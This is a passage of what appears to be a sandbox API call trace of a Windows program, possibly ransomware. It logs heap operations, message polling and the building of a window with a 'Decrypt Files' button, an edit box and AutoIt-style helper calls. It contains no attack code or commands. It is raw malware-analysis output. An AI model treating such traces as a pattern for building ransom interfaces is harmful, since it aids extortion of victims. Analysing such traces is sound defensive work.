hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76470 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd82430 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764d0 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4010 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76500 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76530 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec250 | out: hHeap=0xc60000) returned 1 [0254.675] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed3fe0 | out: hHeap=0xc60000) returned 1 [0254.675] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec250 [0254.675] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76530 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed3fe0 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76500 [0254.676] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4010 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec2a0 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4000 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764d0 [0254.676] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4000 [0254.676] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76470 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4000 [0254.676] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76488 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4000 [0254.676] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764b8 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4000 [0254.676] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xeec2c8 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa0) returned 0xca7388 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764a0 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4000 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766c8 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4120 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766e0 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4130 [0254.676] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4140 [0254.677] CreateWindowExW (dwExStyle=0x100, lpClassName="button", lpWindowName="Decrypt Files", dwStyle=0x50030000, X=176, Y=400, nWidth=113, nHeight=41, hWndParent=0x50150, hMenu=0x3, hInstance=0x290000, lpParam=0x0) returned 0x50148 [0254.677] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.677] NtdllDialogWndProc_W () returned 0x2 [0254.677] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.677] NtdllDialogWndProc_W () returned 0x0 [0254.677] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.677] NtdllDialogWndProc_W () returned 0x0 [0254.677] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.677] NtdllDialogWndProc_W () returned 0x0 [0254.678] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.678] NtdllDialogWndProc_W () returned 0x0 [0254.678] GetStockObject (i=17) returned 0x18a0025 [0254.678] SendMessageW (hWnd=0x50148, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0254.678] GetClientRect (in: hWnd=0x50148, lpRect=0x87f600 | out: lpRect=0x87f600) returned 1 [0254.678] GetWindowRect (in: hWnd=0x50148, lpRect=0x87f600 | out: lpRect=0x87f600) returned 1 [0254.678] SetWindowLongW (hWnd=0x50148, nIndex=-21, dwNewLong=3) returned 0 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec2c8 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764d0 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76470 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76488 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764b8 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec2a0 | out: hHeap=0xc60000) returned 1 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4010 | out: hHeap=0xc60000) returned 1 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec2a0 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764b8 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4010 [0254.678] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764b8 | out: hHeap=0xc60000) returned 1 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec2c8 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764b8 [0254.678] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec2f0 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76488 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4150 [0254.678] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76470 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4150 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4150 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4150 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764d0 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4150 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766f8 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76710 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4150 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76728 [0254.679] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4160 [0254.679] GetDC (hWnd=0x0) returned 0x270101c5 [0254.679] GetDeviceCaps (hdc=0x270101c5, index=90) returned 96 [0254.679] ReleaseDC (hWnd=0x0, hDC=0x270101c5) returned 1 [0254.679] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x150a0713 [0254.679] SendMessageW (hWnd=0x50148, Msg=0x30, wParam=0x150a0713, lParam=0x1) returned 0x0 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76728 | out: hHeap=0xc60000) returned 1 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76710 | out: hHeap=0xc60000) returned 1 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76488 | out: hHeap=0xc60000) returned 1 [0254.679] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76470 | out: hHeap=0xc60000) returned 1 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764d0 | out: hHeap=0xc60000) returned 1 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec2f0 | out: hHeap=0xc60000) returned 1 [0254.680] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4150 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec2f0 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764d0 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766f8 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76470 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76488 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4160 [0254.680] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2) returned 0xed4160 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa0) returned 0xd932c0 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76710 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4170 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76728 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4180 [0254.680] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76740 [0254.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4190 [0254.681] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41a0 [0254.681] CreateWindowExW (dwExStyle=0x200, lpClassName="edit", lpWindowName="", dwStyle=0x503110c4, X=16, Y=56, nWidth=768, nHeight=329, hWndParent=0x50150, hMenu=0x4, hInstance=0x290000, lpParam=0x0) returned 0x30166 [0254.686] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0254.686] NtdllDialogWndProc_W () returned 0x0 [0254.686] GetStockObject (i=17) returned 0x18a0025 [0254.686] SendMessageW (hWnd=0x30166, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0254.688] GetWindowTextLengthW (hWnd=0x30166) returned 0 [0254.688] SendMessageW (hWnd=0x30166, Msg=0xb1, wParam=0x0, lParam=0x0) returned 0x1 [0254.688] GetClientRect (in: hWnd=0x30166, lpRect=0x87f600 | out: lpRect=0x87f600) returned 1 [0254.688] GetWindowRect (in: hWnd=0x30166, lpRect=0x87f600 | out: lpRect=0x87f600) returned 1 [0254.688] SetWindowLongW (hWnd=0x30166, nIndex=-21, dwNewLong=4) returned 0 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764d0 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76518 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764e8 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76470 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76488 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec2f0 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4150 | out: hHeap=0xc60000) returned 1 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec2f0 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76488 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4150 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76470 [0254.688] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4160 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81970 [0254.688] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81970 | out: hHeap=0xc60000) returned 1 [0254.688] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4160 | out: hHeap=0xc60000) returned 1 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec318 [0254.688] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4160 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec340 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe764e8 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41c0 [0254.689] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41c0 | out: hHeap=0xc60000) returned 1 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed41c0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76518 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41d0 [0254.689] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41d0 | out: hHeap=0xc60000) returned 1 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe764d0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec368 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766f8 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41d0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76758 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec390 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76770 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41e0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76788 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81970 [0254.689] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41f0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4200 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe767a0 [0254.689] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767a0 | out: hHeap=0xc60000) returned 1 [0254.689] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3b8 | out: hHeap=0xc60000) returned 1 [0254.689] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4200 | out: hHeap=0xc60000) returned 1 [0254.689] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41f0 | out: hHeap=0xc60000) returned 1 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe767a0 [0254.689] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe767b8 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe767d0 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe767e8 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76800 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76818 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76830 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76848 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76860 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed41f0 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3e0 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76878 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4200 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4200 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76878 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3e0 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41f0 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767b8 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767a0 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767d0 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe767e8 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76800 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76830 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76818 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76848 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76860 | out: hHeap=0xc60000) returned 1 [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3b8 | out: hHeap=0xc60000) returned 1 [0254.690] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41f0 [0254.690] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0254.690] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0254.690] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3b8 | out: hHeap=0xc60000) returned 1 [0254.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41f0 | out: hHeap=0xc60000) returned 1 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3b8 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed41f0 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec3e0 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76860 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4200 [0254.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4200 | out: hHeap=0xc60000) returned 1 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4200 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76848 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4210 [0254.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4210 | out: hHeap=0xc60000) returned 1 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4210 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76818 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.691] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe76830 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec408 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76800 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4220 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe767e8 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec430 [0254.691] 